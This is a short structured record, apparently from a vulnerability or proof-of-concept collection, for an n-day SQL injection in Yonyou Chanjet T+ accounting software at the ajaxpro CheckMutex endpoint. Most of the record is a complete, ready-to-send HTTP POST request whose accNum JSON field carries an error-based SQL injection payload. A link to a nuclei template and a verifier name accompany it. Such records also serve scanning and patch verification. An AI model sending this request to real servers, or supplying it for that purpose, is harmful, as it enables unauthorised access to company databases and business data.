vendor = "用友"
name = "用友 畅捷通-TPlus SQL注入"
type = "SQL注入"
version = "未知"
path = "/tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx"
detail = "POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.445.106 Safari/537.36 Content-Length: 248 Connection: close Content-Type: application/json Accept-Encoding: gzip {\"accNum\": \"3' AND 5227 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5227=5227) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(120)+CHAR(113)))-- NCab\", \"functionTag\": \"SYS0104\", \"url\": \"\"}"
fix = "https://github.com/adysec/nuclei_poc/blob/a3e061725d85f48341c572e1db1112bcdd6df14e/poc/sql/yonyou-chanjet-tplus-checkmutex-sqli.yaml#L20"
date = "0703"
label = "nday"
verifier = "AdySec"
